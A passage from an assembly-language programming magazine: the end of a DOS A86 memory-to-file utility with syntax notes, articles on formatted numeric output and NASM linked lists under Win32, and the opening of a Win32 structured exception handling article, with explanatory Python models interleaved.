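It is a sketch under assumptions: the contents of HexTable and the exact
behaviour of TableFind (index returned in BX, carry set when the character
is not found) are inferred from the comments in the listing, and shl16 and
convert are names invented for the model.

```python
HEX_TABLE = "0123456789ABCDEF"     # assumed contents of HexTable

def shl16(value, count):
    """16-bit SHL done one bit at a time, like the 8088 expansion."""
    for _ in range(count):
        value = (value << 1) & 0xFFFF
    return value

def convert(text):
    """Fold a string of hex digits into a 16-bit result, as Convert does."""
    result = 0                                   # clr dx
    for ch in text:
        index = HEX_TABLE.find(ch.upper())       # MakeUpper + TableFind
        if index < 0:
            raise ValueError("bad hex digit: " + repr(ch))   # jc BadNumber
        result = shl16(result, 4) | index        # shl dx, 4 / or dl, bl
    return result

if __name__ == "__main__":
    print(hex(convert("b800")))
```

Because the shift leaves the low four bits of DX empty, OR-ing the table
index into DL is enough to append the new digit. Digits beyond the fourth
simply push the oldest ones out of the 16-bit register.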
--- Mem2File ------------------------------------------------ Restart --
or dl, bl ; bx = index into table
jmp L1 ; repeat until done
;------------------------
Credits: mov dx, offset Mess002
mov cx, Len002
mov bx, stdout
mov ah, 040
int 021 ; print some egotripping data
ret
;------------------------
main: call InitMem ; prime volatile data
mov al, [080] ; get tail length
cbw ; make 16 bits long
mov si, 081 ; point to start of tail
add si, ax ; point to end of tail
mov [si], ah ; make commandtail ASCIIZ
call GetArg ; get argument from command tail
jc SyntErr ; if error, get out
call Convert ; convert text to hex
mov [Start.SegVal], ax ; store it
call GetArg ; etcetera
jc SyntErr
call Convert
mov [Start.OffVal], ax
L0: call GetArg
jc SyntErr
cmp b [Argument], '-' ; single '-' character?
je L0 ; if so, ignore it
call Convert
mov [Stop.SegVal], ax
call GetArg
jc SyntErr
call Convert
mov [Stop.OffVal], ax
call GetArg
IF C jmp SyntErr
--- Mem2File ------------------------------------------------- Break ---
This is one of the A86 enhancements. This IF construct saves you from
having to make up all kinds of ridiculous label names like jmp_01F in a
construct as follows:
call GetArg
jnc jmp_01F
jmp SyntErr
jmp_01F: ...
The IF construct (not to be confused with the "#IF" construct which is
for conditional assemblies) lets you state the condition just as you
would in a high level language; A86 generates the short jump on the
reverse condition around the statement for you:
IF C jmp SyntErr
Neat, isn't it?
--- Mem2File ------------------------------------------------ Restart --
mov si, offset Argument
add si, [ArgNum]
mov b [si], 0 ; make it ASCIIZ
mov dx, offset FileName ; same as Argument buffer....
mov cx, 0
mov ah, 03C
int 021 ; create the file
IF C jmp SyntErr
--- Mem2File ------------------------------------------------- Break ---
See how powerful the IF construct can be? It is a very convenient way to
circumvent the foolish conditional instructions of the x86 architecture.
--- Mem2File ------------------------------------------------ Restart --
mov [Handle], ax
mov ax, [Stop.SegVal]
mov dx, 0 ; prime DX
mov cx, 4
L0: shl ax, 1
rcl dx, 1
loop L0 ; shift upper 4 bits of address into DX
add ax, [Stop.OffVal]
adc dx, 0 ; now, dx:ax = linear address to stop at
mov [Stop.SegVal], dx
mov [Stop.OffVal], ax ; store linear address STOP
mov ax, [Start.SegVal]
mov dx, 0 ; prime DX
mov cx, 4
L0: shl ax, 1
rcl dx, 1
loop L0 ; shift upper 4 bits of address into DX
add ax, [Start.OffVal]
adc dx, 0 ; now, dx:ax = linear address to start from
mov [Start.SegVal], dx
mov [Start.OffVal], ax ; store linear address START
cmp dx, [Stop.SegVal] ; start > stop?
ja >L1 ; fix it!
jb >L2
--- Mem2File ------------------------------------------------- Break ---
A86 likes to have as many labels as possible declared before they are
referenced. That's why there is often code "before" the subroutine
name is declared.
For local labels (i.e. labels that consist of 1 letter and the rest
decimal digits) it is a MUST that they are defined before being
referenced.
If, for some reason, you do not want to put a label backwards in memory,
you can forward reference a local label by prefixing it with a ">" sign.
A86 now knows that the local label is still to come. This is no luxury:
because local labels can be redefined again and again, many A86
programmers get by with 4 or 5 of them in over 2000 lines of code.
L0 in particular is nearly always free for reuse.
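The arithmetic in the listing just before this note (four SHL/RCL pairs
followed by ADD/ADC) folds a real-mode segment:offset pair into one linear
address. A minimal Python model of that step and of the start/stop swap that
follows it; linear and ordered are illustrative names, not part of Mem2File.

```python
def linear(segment, offset):
    """Fold a real-mode segment:offset pair into one linear address."""
    return (segment << 4) + offset      # shl/rcl four times, then add/adc

def ordered(start, stop):
    """Return the two linear addresses with the lower one first."""
    return (stop, start) if start > stop else (start, stop)

if __name__ == "__main__":
    print(hex(linear(0xB800, 0x0000)))
    print([hex(a) for a in ordered(linear(0x2000, 0), linear(0x1000, 0))])
```

Comparing linear addresses instead of raw segment:offset pairs matters
because many different pairs name the same byte.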
--- Mem2File ------------------------------------------------ Restart --
cmp ax, [Stop.OffVal] ; start > stop?
jbe >L2 ; if not, OK
L1: push [Stop.SegVal]
push [Stop.OffVal] ; swap start and stop addresses
mov [Stop.SegVal], dx
mov [Stop.OffVal], ax
pop [Start.OffVal]
pop [Start.SegVal]
L2: mov dx, [Stop.SegVal]
mov ax, [Stop.OffVal]
add ax, 1
adc dx, 0 ; limits are INCLUSIVE
sub ax, [Start.OffVal]
sbb dx, [Start.SegVal] ; dx:ax = bytes to move
shl ax, 1
rcl dx, 1
shl ax, 1
rcl dx, 1 ; dx = nr of 16 Kb blocks to move
mov [Blocks], dx ; store it
shr ax, 2 ; ax = remainder to move
mov [Rest], ax ; save it
mov ax, [Start.SegVal] ; end of linear addressing, we're going to DOS!
mov cl, 12
shl ax, cl
mov [Start.SegVal], ax
mov es, ds ; use es to refer to data
mov bx, [Handle]
lds dx, d [Start]
--- Mem2File ------------------------------------------------- Break ---
Normally this instruction would require a secretary with 100 letters per
minute typing rate:
lds dx, dword ptr [Start]
But the "ptr" argument is always the same, so it is only there to please
the assembler and humiliate the programmer: entering data that nobody
needs.
Therefore A86 only needs the first letter of such prose. In our case:
the "dword ptr" is abbreviated to a "d". "Byte ptr" is a "b". "Word Ptr"
is a "w". Simple as that.
So if your coding skills outweigh your typing speed, you should consider
switching to the superior assembler. :)
--- Mem2File ------------------------------------------------ Restart --
es cmp [Blocks], 0 ; if less than 16 Kb, skip this one.
--- Mem2File ------------------------------------------------- Break ---
For people who still remember that "Seg ES" is a legal instruction
(used for a segment override) this might bring back memories.
A86 allows the user to put the segmentation override before the actual
instruction. This way, the operand field looks neater. And it is also
the way in which D86 shows segmentation overrides.
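The listing around this note splits the byte count into whole 16 KB blocks
plus a remainder and then writes them one DOS call at a time. The Python
sketch below models only that bookkeeping; split and chunks are invented
names, and the model mirrors the register arithmetic of the listing without
claiming anything about how DOS itself treats a buffer that runs past the
end of a segment.

```python
BLOCK = 0x4000                      # 16 KB, the "16K" constant of the listing

def split(count):
    """Split a byte count into whole 16 KB blocks plus a remainder."""
    return divmod(count, BLOCK)     # (Blocks, Rest)

def chunks(start, stop):
    """Yield (segment, offset, length) for each write call.

    start and stop are inclusive linear addresses with start <= stop.
    """
    blocks, rest = split(stop - start + 1)
    segment = ((start >> 16) << 12) & 0xFFFF   # upper bits go back into DS
    offset = start & 0xFFFF                    # low 16 bits stay in DX
    for _ in range(blocks):
        yield segment, offset, BLOCK
        offset += BLOCK                        # add dx, 04000
        if offset > 0xFFFF:                    # IF C add ax, 01000
            offset &= 0xFFFF
            segment = (segment + 0x1000) & 0xFFFF
    if rest:
        yield segment, offset, rest

if __name__ == "__main__":
    for seg, off, length in chunks(0x1C000, 0x24000):
        print("%04X:%04X  %5d bytes" % (seg, off, length))
```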
--- Mem2File ------------------------------------------------ Restart --
je >S0
mov cx, 16K
L0: mov ah, 040
int 021
mov ax, ds ; store ds into ax
add dx, 04000 ; next buffer to load data from
IF C add ax, 01000 ; if carry, inc ds
mov ds, ax ; ds:dx now ready for next bufferfull of data
es dec [Blocks]
jnz L0
S0: es cmp [Rest], 0
je >L1
mov ah, 040
es mov cx, [Rest]
int 021
L1: mov ds, es
mov bx, [Handle]
mov ah, 03E
int 021 ; close file
call Credits ; show my ego
mov ax, 04C00
int 021 ; exit to DOS
--- Mem2File -------------------------------------------------- End ----
That's it.
jverhoeven@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Formatted Numeric Output
by Laura Fairhead
Here I am going to present you with a very useful routine for numeric
output. I have been using it myself for some time and now I think it is
almost perfect.
It consists of two basic routines. The first (nuconvs) you call when you
want to change the parameters of the main routine (nuconv). You simply call
it with one DWORD in EAX, which specifies the following:
EAX = SSFFPPRR (hexadecimal value of course)
SS size size of the datum you will be calling the main routine with,
only 3 values are valid:
0=byte
1=word
2=dword
FF field size of a field in which to right-justify the number;
if this is 0 there is no right-justification and you
get only the number
PP pad the ASCII value of the character to use to right-justify
the number in the field of output
RR radix the radix to output the number in
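As an illustration of the SSFFPPRR layout, here is a small Python helper
that builds the value to load into EAX. The name pack_params is hypothetical
and the helper performs no validation, just like the routine it feeds.

```python
def pack_params(size, field, pad, radix):
    """Build the SSFFPPRR dword: size, field width, pad character, radix."""
    return ((size & 0xFF) << 24) | ((field & 0xFF) << 16) \
        | ((ord(pad) & 0xFF) << 8) | (radix & 0xFF)

if __name__ == "__main__":
    value = pack_params(size=1, field=6, pad="0", radix=10)
    print("%08X" % value)
    # A dword store on x86 is little-endian, so memory receives the bytes
    # in the order radix, pad, field, size.
    print(list(value.to_bytes(4, "little")))
```

The little-endian byte order is the reason a single dword store is enough
to fill four separate byte variables in one go.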
Once you've set the control parameters you can call the main routine
(nuconv) freely to do the work. You call the main routine with ES:DI set
to where the output is to be stored, and the value to be output in AL or
AX or EAX (depending on what data size you set).
I use the word 'output' here which might conjure up images of the screen,
but in fact what we are doing here is writing all the ASCII to memory.
This is much more powerful than incorporating all that OS/application
specific nonsense, and it really doesn't cost much overhead at all (in
fact this is the way C does it and even though I **HATE** C, here it is
right on the mark;)
Here is the code:
================START OF CODE==============================================
;
;nuconvs- set control parameters for 'nuconv'
;
; !! this must be called at least once before calling nuconv
;
;entry: EAX=SSFFPPRR (hex digits)
;
; where: SS=data size (0=byte,1=word,2=dword)
; FF=field size (0=none)
; PP=pad char
; RR=radix (2-16)
;
; !! these parameters must be set correctly by the application
; !! they are not validated in any way and invalid parameters
; !! will cause undefined operation
;
;exit: (all registers preserved)
;
nuconvs PROC NEAR
MOV DWORD PTR CS:[nuradix],EAX
RET
nuconvs ENDP
;
;control parameters
;
; !! these absolutely must be in the below order due to the way the above
; routine works
;
nuradix DB ? ;output radix
nupad DB ? ;pad character
nufld DB ? ;field size
nudsiz DB ? ;data size
;
;nuconv- output value in accumulator -> ES:DI
;
; !! see 'nuconvs' header for more information
;
;entry: AL|AX|EAX=value to output
; ES:DI=address to write output data
;
; size of accumulator that is used depends on what the current data
; size is ( as specified by a previous call to 'nuconvs' )
;
;
;exit: DI=updated to offset of last character + 1
;
; (all other registers preserved)
;
nuconv PROC NEAR
;
;all registers are going to be preserved
;
PUSH DS
PUSH EAX
PUSH EBX
PUSH CX
PUSH EDX
;
;save some CS: overrides
;
PUSH CS
POP DS
;
;initialise
;
; set EBX =radix
; CX =fieldsize
;
; also we zero pad out the datum passed so it fills EAX
;
XOR EBX,EBX
CMP BL,BYTE PTR DS:[nudsiz]
JNP SHORT ko1
JS SHORT ko0
MOV AH,0
ko0: DEC BX
AND EAX,EBX
INC BX
ko1:
MOV BL,BYTE PTR DS:[nuradix]
MOV CH,0
MOV CL,BYTE PTR DS:[nufld]
;
;calculate digits and push to stack
;
; EAX is divided and modulus taken which is the standard way,
; loop exits when it reaches 0 or the field size is hit
; notice that if CX=0 on entry to this then the field size
; will be effectively unbounded
;
nulop0: XOR EDX,EDX
DIV EBX
PUSH DX
AND EAX,EAX
LOOPNZ nulop0
;
;'output' the field padding
;
; the number of padding characters is normally the value
; now in CX (ie: fieldsize - digits ). however no pad chars
; should be output if field size = 0. i think the check here
; for this is nice and tight (read the code...)
;
MOV BX,CX
NEG BX
JNS SHORT ko
MOV AL,BYTE PTR DS:[nupad]
REP STOSB
ko:
;
;'output' all the digits
;
; CX is set to the number of digits on the stack we have to output
; ie: fieldsize - ( fieldsize - digits )
;
MOV CH,0
MOV CL,BYTE PTR DS:[nufld]
ADD CX,BX
;
; now we pop off those #CX digits translating into ASCII using a nice
; variation of the traditional speed method
;
MOV BX,OFFSET nudat
nulop1: POP AX
XLAT
STOSB
LOOP nulop1
;
; restore all registers and exit (in case it wasn't obvious!)
;
POP EDX
POP CX
POP EBX
POP EAX
POP DS
RET
;
nudat DB "0123456789ABCDEF"
;
nuconv ENDP
==================END OF CODE==============================================
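To make the behaviour of the routine above easier to check by hand, here is
a rough Python model of it. It is only a sketch: it returns a string
instead of writing to ES:DI, takes the control parameters as arguments
instead of reading them from nuradix/nupad/nufld/nudsiz, and the default
argument values are choices made for the model alone.

```python
DIGITS = "0123456789ABCDEF"             # same table as nudat
MASKS = (0xFF, 0xFFFF, 0xFFFFFFFF)      # data size 0=byte, 1=word, 2=dword

def nuconv(value, size=2, field=0, pad=" ", radix=10):
    """Return the text that the assembly routine would store."""
    value &= MASKS[size]                # zero-extend the datum
    digits = []
    while True:
        value, remainder = divmod(value, radix)    # DIV EBX
        digits.append(DIGITS[remainder])           # PUSH DX
        if value == 0 or len(digits) == field:     # LOOPNZ exit conditions
            break
    text = "".join(reversed(digits))    # digits come off the stack reversed
    if field:
        text = pad * (field - len(text)) + text    # REP STOSB padding
    return text

if __name__ == "__main__":
    print(nuconv(1234, size=1, field=6, pad="0"))
    print(nuconv(255, radix=16))
```

One consequence of the LOOPNZ exit test is worth knowing: a number with more
digits than the field is cut down to its low-order digits, not widened.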
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Linked Lists in ASM
by mammon_
Assembly language is notorious for being low-level; to wit, it lacks many of
the features in higher-level languages which make programming easier. In the
course of my work on the visasm project I have put quite a bit of time into
working out exactly which higher-level language features are important and
which, in a nutshell, are swill.
One of the areas in which assembly language is lacking is the use of dynamic
structures. Pointer manipulation in asm is simple and clear for up to one
level of indirection; further indirection quickly turns the code into a
confusion of register juggling and indirect addressing. As a result,
implementing even a simple linked list in assembly language can be tedious
enough to make one rewrite the project in C.
In this article I have undertaken an implementation of a linked list in NASM;
the implementation is generic enough to support more complex data structures,
and should port to other assemblers with few changes.
To begin with, one must define the memory allocation routines for use in the
application; I have chosen Win32 for convenience. The routines defined below
are for local heap allocation and for the Win32 console interface to allow the
use of STDOUT on the console.
;=========================================================Win32 API Definitions
STD_INPUT_HANDLE EQU -10 ;nStdHandle types
STD_OUTPUT_HANDLE EQU -11
STD_ERROR_HANDLE EQU -12
EXTERN AllocConsole ;BOOL AllocConsole()
EXTERN GetStdHandle ;HANDLE GetStdHandle( nStdHandle )
EXTERN WriteConsoleA ;HANDLE hConsole, lpBuffer, Num2Write, lpWritten,NULL
EXTERN ExitProcess ;UINT ExitCode
EXTERN GetProcessHeap ;
EXTERN HeapAlloc ;HANDLE hHeap,DWORD dwFlags, DWORD dwBytes:ret ptr
EXTERN HeapFree ;HANDLE hHeap,DWORD dwFlags, LPVOID lpMem
EXTERN HeapReAlloc ;HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,DWORD dwBytes
EXTERN HeapDestroy ;HANDLE hHeap
%define HEAP_NO_SERIALIZE 0x00000001
%define HEAP_GROWABLE 0x00000002
%define HEAP_GENERATE_EXCEPTIONS 0x00000004
%define HEAP_ZERO_MEMORY 0x00000008
%define HEAP_REALLOC_IN_PLACE_ONLY 0x00000010
%define HEAP_TAIL_CHECKING_ENABLED 0x00000020
%define HEAP_FREE_CHECKING_ENABLED 0x00000040
%define HEAP_DISABLE_COALESCE_ON_FREE 0x00000080
%define HEAP_CREATE_ALIGN_16 0x00010000
%define HEAP_CREATE_ENABLE_TRACING 0x00020000
%define HEAP_MAXIMUM_TAG 0x0FFF
%define HEAP_PSEUDO_TAG_FLAG 0x8000
%define HEAP_TAG_SHIFT 16
;===========================================================End API Definitions
In addition, it is useful to define a few common routines for use later:
;==============================================================Utility Routines
[section data class=DATA use32] ;set up the segments early
%macro STRING 2+
%1: db %2
.end:
%define %1.length %1.end - %1
%endmacro
[section code class=CODE use32]
GetConsole:
;GetConsole()
[section data]
hConsole DD 0
[section code]
call AllocConsole
push dword STD_OUTPUT_HANDLE
call GetStdHandle
mov [hConsole], eax
xor eax, eax
ret
puts:
;puts( ptrString, NumBytes )
[section data]
NumWrote DD 0
[section code]
%define _ptrString ebp + 8
%define _strlen ebp + 12
push ebp
mov ebp,esp
push eax
push dword 0
push dword NumWrote
mov eax, [ _strlen ]
push dword eax
mov eax, [ _ptrString ]
push dword eax
push dword [hConsole]
call WriteConsoleA
pop eax
mov esp, ebp
pop ebp
ret 8
;==========================================================End Utility Routines
The STRING macro is particularly interesting; it allows one to define a string
in the data segment as
STRING label, 'contents of string',0Dh,0Ah
while defining the constant label.length as the total length of the string.
This will come in handy during the many calls to puts, which is used to write
to the Win32 console. Puts has the syntax
puts( lpString, strLength )
and preserves EAX, so the BOOL result of WriteConsoleA is discarded. GetConsole
is a routine provided to move the Win32 console allocation code out of the
main program; it takes no parameters and defines the hConsole handle.
The linked list implementation has been designed to be extendable; the routine
names are prefaced with underscores to avoid filling up the namespace of the
linked list application, and the routines themselves are generic enough to be
called from higher-level Stack, Queue, and List implementations. The Linked
List interface is as follows:
ptrHead _create_list( hHeap, NodeSize )
void _delete_list( hHeap, ptrHead)
ptrNode _add_node( hHeap, ptrPrev, NodeSize )
void _delete_node( hHeap, ptrPrev, ptrNode )
void _set_node_data( ptrNode, NodeOffset, data )
DWORD data _get_node_data( ptrNode, NodeOffset )
The names of the routines should make their intent apparent; note however that
NodeSize is assumed to be the size of a LISTSTRUCT structure.
;====================================================Linked List Implementation
[section data]
;Define .next as offset Zero for use in generic functions
struc _llist
.next: resd 1 ;this is basically a constant
endstruc
;Macro to ensure that .next is always at offset zero in user-defined lists
%macro LISTSTRUCT 1
struc %1
.next: resd 1
%endmacro
%macro END_LISTSTRUCT 0
endstruc
%endmacro
[section code]
;Note that these assume an LISTSTRUCT base type
_create_list:
; ptrHead _create_list( hHeap, NodeSize )
%define _hHeap ebp + 8
%define _ListSize ebp + 12
ENTER 0 , 0
push dword [_ListSize] ;size of LISTSTRUCT
push dword HEAP_ZERO_MEMORY ;FLAG for HeapAlloc
push dword [_hHeap] ;Heap being used
call HeapAlloc
test eax, eax
jz .Error ;Alloc failed!
mov [eax + _llist.next], dword 0 ;.next pointer = NULL
.Exit: LEAVE ;eax = ptrHead
ret 8
.Error: xor eax, eax ;error = return NULL
jmp .Exit
_delete_list:
; _delete_list( hHeap, ptrHead)
%define _hHeap ebp + 8
%define _ptrHead ebp + 12
ENTER 0, 0
push eax
push ebx ;save registers
mov eax, [_ptrHead] ;eax = addr of list head node
.DelNode:
mov ebx, [eax + _llist.next] ;ebx = [eax].next
push eax ;free addr in eax
push dword 0 ;FLAG
push dword [_hHeap] ;local heap
call HeapFree
test ebx, ebx ;is [eax].next == NULL?
jz .Exit ;if yes then done
mov eax, ebx ;loop until done
jmp .DelNode
.Exit: pop ebx
pop eax
LEAVE
ret 8
_add_node:
; ptrNode _add_node( hHeap, ptrPrev, NodeSize )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ListSize ebp + 16
ENTER 0, 0
push edx ;HeapAlloc kills edx!!
push ebx
push ecx ;save registers
mov ebx, [_ptrPrev] ;ebx = node to add after
push dword [_ListSize] ;size of node
push dword HEAP_ZERO_MEMORY ;FLAG
push dword [_hHeap] ;local heap
call HeapAlloc
test eax, eax
jz .Error ;alloc failed!
mov ecx, [ebx + _llist.next] ;ecx = ptrPrev.next (ebx = ptrPrev)
mov [eax + _llist.next], ecx ;ptrNew.next = ptrPrev.next (eax = ptrNew)
mov [ebx + _llist.next], eax ;ptrPrev.next = ptrNew
.Exit: pop ecx
pop ebx
pop edx
LEAVE
ret 12
.Error: xor eax, eax ;return NULL on failure
jmp .Exit
_delete_node:
; _delete_node( hHeap, ptrPrev, ptrNode )
%define _hHeap ebp + 8
%define _ptrPrev ebp + 12
%define _ptrNode ebp + 16
ENTER 0, 0
push ebx
mov eax, [_ptrNode] ;eax = ptrNode
mov eax, [eax + _llist.next] ;eax = ptrNode.next
mov ebx, [_ptrPrev] ;
mov [ebx + _llist.next], eax ;ptrPrev.next = ptrNode.next
push dword [_ptrNode] ;free ptrNode
push dword 0 ;FLAG
push dword [_hHeap] ;local heap
call HeapFree
pop ebx
LEAVE
ret 12
_set_node_data:
; _set_node_data( ptrNode, NodeOffset, data )
%define _ptrNode ebp + 8
%define _off ebp + 12
%define _data ebp + 16
ENTER 0, 0
push eax
push ebx
mov eax, [_ptrNode] ;eax = ptrNode
add eax, [ _off ] ;eax = ptrNode.offset
mov ebx, [_data] ;ebx = data
mov [eax], ebx ;ptrNode.offset = data
pop ebx
pop eax
LEAVE
ret 12
_get_node_data:
; DWORD data _get_node_data( ptrNode, NodeOffset )
%define _ptrNode ebp + 8
%define _off ebp + 12
ENTER 0, 0
mov eax, [_ptrNode] ;eax = ptrNode
add eax, [_off] ;eax = ptrNode.offset
mov eax, [eax] ;return [ptrNode.offset]
LEAVE
ret 8
;===============================================================End Linked List
The LISTSTRUCT structure is perhaps the most crucial part of this implemen-
tation. In NASM, a structure is simply a starting address with local labels
defined as constants which equal the offset of the local label from the start
of the structure. Thus, in the structure
struc MyStruc
.MyVar resd 1
.MyVar2 resd 1
.MyVar3 resd 1
.MyByte resb 1
endstruc
the constant MyStruc.MyVar has a value of 0 [0 bytes from the start of the
structure], MyStruc.MyVar2 has a value of 4, MyStruc.MyVar3 has a value of 8,
MyStruc.MyByte has a value of 12, and MyStruc_size [defined as the offset of
the "endstruc" directive] has a value of 13. Note that in NASM, the name of a
structure instance determines the address in memory of the instance [i.e., it
is a simple code label], while the constants defined in the structure
definition allow access to offsets from that address.
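The offset bookkeeping that NASM does for a struc can be reproduced in a few
lines of Python. This is only a model of the arithmetic; the function name
struc_offsets and the list-of-pairs input format are inventions of this
sketch.

```python
def struc_offsets(fields):
    """fields is a list of (name, size_in_bytes) pairs in declaration order.

    Returns (offsets, size): the offset constant for each member and the
    value the _size constant would take.
    """
    offsets = {}
    position = 0
    for name, size in fields:
        offsets[name] = position     # member constant = offset from start
        position += size             # resd 1 adds 4, resb 1 adds 1
    return offsets, position

if __name__ == "__main__":
    members = [("MyVar", 4), ("MyVar2", 4), ("MyVar3", 4), ("MyByte", 1)]
    offsets, size = struc_offsets(members)
    print(offsets, size)
```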
What this means is that structures in NASM can be defined and never instant-
iated, allowing the convenient use of the structure constants for dynamic
memory structures such as classes and linked list nodes. The above code uses
the LISTSTRUCT macro to force all linked list nodes to have a ".next" member;
this also allows the use of the constant "_llist.next" in the linked list
routines to avoid having to pass the offset of the ".next" member for a node.
The implementation routines should be pretty straightforward. _create_list
allocates memory from the local heap of the size of one list node [determined
by the parameter NodeSize passed to _create_list] and returns the address of
the allocated memory; since this node is assumed to be the list "head", the
.next member is set to NULL. _delete_list is passed the address of the head
node of the list; it saves the address in the .next member of the node and
then frees the memory allocated to the node, repeating this with each .next
link until the .next member is NULL [indicating an end of list].
_add_node is used to insert a node into an existing list; it is passed the
address of the node after which the new node is to be inserted. The .next
member of this node is moved into the .next member of the new node, and
replaced with the address of the new node. Thus, if before insertion the list
had the structure
  .next [Node1] -->     .next [Node2] -->     .next [NULL]
  .data NULL            .data Node1           .data Node2
then it would have the following structure after insertion following Node1:
  .next [Node1] -->     .next [NewNode] -->   .next [Node2] -->     .next [NULL]
  .data NULL            .data Node1           .data NewNode         .data Node2
_delete_node does the opposite of _add_node; it moves the .next member of the
node to be deleted into the .next member of the preceding node, then frees the
specified node.
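The pointer shuffling described above is easier to follow without registers
in the way. Here is a minimal Python model of insertion after a node and of
deletion given the preceding node; the class and function names are made up
for the sketch, and Python's garbage collector stands in for HeapFree.

```python
class Node:
    def __init__(self, data=None):
        self.next = None            # the .next member, NULL for the tail
        self.data = data

def add_node(prev, data=None):
    """Insert a new node after prev and return it."""
    new = Node(data)
    new.next = prev.next            # new node inherits prev's old successor
    prev.next = new                 # prev now points at the new node
    return new

def delete_node(prev, node):
    """Unlink node, which must directly follow prev."""
    prev.next = node.next

def walk(head):
    """Collect the data of every node after the head."""
    result, node = [], head.next
    while node is not None:
        result.append(node.data)
        node = node.next
    return result

if __name__ == "__main__":
    head = Node()
    node1 = add_node(head, "Node1")
    add_node(node1, "Node2")
    add_node(node1, "NewNode")
    print(walk(head))
```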
Note that both _delete_node and _add_node are designed to be as generic as
possible and make no assumptions regarding the linked list structure; thus in
a double linked list of the format
struc DLLIST
.next resd 1
.prev resd 1
.data resd 1
endstruc
one could front-end the Delete function as follows:
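DelNode:
push dword eax ;eax = Node to delete
push dword [eax + DLLIST.prev] ;ptrPrev = Node.prev
push dword [hHeap] ;the heap handle itself, not its address
call _delete_node ;the callee removes its three arguments
ret ;DelNode takes its argument in eax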
The other linked list routines can be provided with similar front-ends to take
care of common heap handles, list sizes, and member assignments.
Both the _set_node_data and the _get_node_data routines are basic pointer
manipulations added for code clarity. Each could be rewritten inline; for
example, the _get_node_data routine can be implemented as
add ebx, offset
mov eax, [ebx]
assuming ebx holds the node to be accessed and "offset" is the offset [or
constant] of the node member to be accessed.
Below is a simple program which makes a four-node linked list of the format
  .next Node1 -->   .next Node2 -->   .next Node3 -->   .next NULL
  .prev NULL <--    .prev Head <--    .prev Node1 <--   .prev Node2
  .data NULL        .data 'node1'     .data 'node2'     .data 'node3'
Note the use of the NewNode routine, which provides a front-end to _add_node
that sets the .prev member for the new node. One brief caveat: the example
does not delete the list, as the Win32 heap is deallocated on program
termination; neither is there any substantial error checking in the sample.
;=======================================================Linked List Application
[section data]
hHeap dd 0
ptrHead dd 0
STRING strData1, 'node 1',0Dh,0Ah
STRING strData2, 'node 2',0Dh,0Ah
STRING strData3, 'node 3',0Dh,0Ah
STRING strStart, 'Creating List',0Dh,0Ah
STRING strDone, 'Finished!',0Dh,0AH,'Printing Data...',0Dh,0Ah
STRING strErr, 'Error!',0Dh, 0AH
LISTSTRUCT llist
.prev resd 1
.data resd 1
END_LISTSTRUCT
[section code]
Error:
push dword strErr.length
push dword strErr
call puts
jmp Exit
..start:
call GetProcessHeap
mov [hHeap], eax
call GetConsole
push dword strStart.length
push dword strStart
call puts
CreateList:
push dword llist_size
push dword [hHeap]
call _create_list
test eax, eax
jz Error
mov [ptrHead], eax
push dword 0
push dword llist.data
push eax
call _set_node_data ;set ptrHead.data to NULL
push dword 0
push dword llist.prev
push eax
call _set_node_data ;set ptrHead.prev to NULL
call NewNode ;create Node1
test eax, eax
jz ListDone
push dword strData1
push dword llist.data
push eax
call _set_node_data ;set Node1.data to 'node1'
call NewNode ;create Node2
test eax, eax
jz ListDone
push dword strData2
push dword llist.data
push eax
call _set_node_data ;set Node2.data to 'node2'
call NewNode ;create Node3
test eax, eax
jz ListDone
push dword strData3
push dword llist.data
push eax
call _set_node_data ;set Node3.data to 'node3'
ListDone:
push dword strDone.length
push dword strDone
call puts
mov ebx, [ptrHead]
PrintList:
push dword _llist.next
push ebx
call _get_node_data ;could have been mov eax,[ebx]
test eax, eax ;if ptrCurrent.next == NULL exit
jz Exit ; [end of list]
mov ebx, eax ;save ptrNode
push dword strData1.length ;push length for call to puts
push dword llist.data
push ebx
call _get_node_data ;get ptrNode.data
push dword eax ;push string for call to puts
call puts
jmp PrintList ;loop
Exit:
push dword 0
call ExitProcess
NewNode:
ENTER 0, 0
push edx
mov edx, eax ;save previous node
push dword llist_size
push dword eax
push dword [hHeap]
call _add_node
test eax, eax
jz .Done
push dword eax
push dword llist.next
push dword edx
call _set_node_data ;set ptrPrev.next to ptrNew
push edx
push dword llist.prev
push eax
call _set_node_data ;set ptrNew.prev to ptrPrev
push dword 0
push dword llist.next
push eax
call _set_node_data ;set PtrNew.next to NULL
.Done: pop edx
LEAVE ;eax is still set to ptrNew
ret
;==========================================================================EOF
As mentioned earlier, this is a generic implementation of dynamic structures
designed with linked lists in mind. The macros and routines may be included in
a header file such as llist.h and used to automate the creation of dynamic
memory structures in future projects. In addition, further macros and routines
can be added to provide specific implementations of Single Linked Lists,
Double Linked Lists, Circular Lists, Stacks, Queues, and Deques.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Structured Exception Handling under Win32
by Chris Dragan
Structured Exception Handling is a powerful feature of all Win32 platforms
that allows a program to recover from critical errors such as BOUND range
violations, divide overflow, missing pages or general protection faults. It is
documented only for C-level usage (try-except/finally syntax); no documentation
for low-level languages exists. I will therefore try to show how to use it.
The starting point for Structured Exception Handling, SEH, is the Thread
Information Block. The TIB, like almost all the other structures, is described
in the winnt.h file that comes with the Platform SDK.
struc NT_TIB
ExceptionList dd ? ; Used by SEH
StackBase dd ? ; Used by functions to check for
StackLimit dd ? ; stack overflow
SubSystemTib dd ? ; ?
FiberDataOrVersion dd ? ; ?
ArbitraryUserPointer dd ? ; ?
Self dd ? ; Linear address of the TIB
ends
The TIB is accessible at address fs:0. NT_TIB.Self contains the linear address
of the TIB, which is the base of the FS segment.
When an exception occurs, the system uses (dword)fs:0, NT_TIB.ExceptionList
to find an exception handler and execute it. The exception list entry is very
simple:
struc E_L_ENTRY
Next dd ? ; Points to next entry in the list
ExceptionHandler dd ? ; User callback - exception hook
Optional db X dup (?) ; Exception Handler data
EntryTerminator dd -1 ; Optional
ends
C compilers usually keep some additional information in E_L_ENTRY.Optional
field of varying size and usually terminated with (dword)-1. Both .Optional
and .EntryTerminator fields are not required.
Before calling an exception handler, the exception manager pushes
ExceptionRecord and ContextRecord onto the stack. These structures identify the
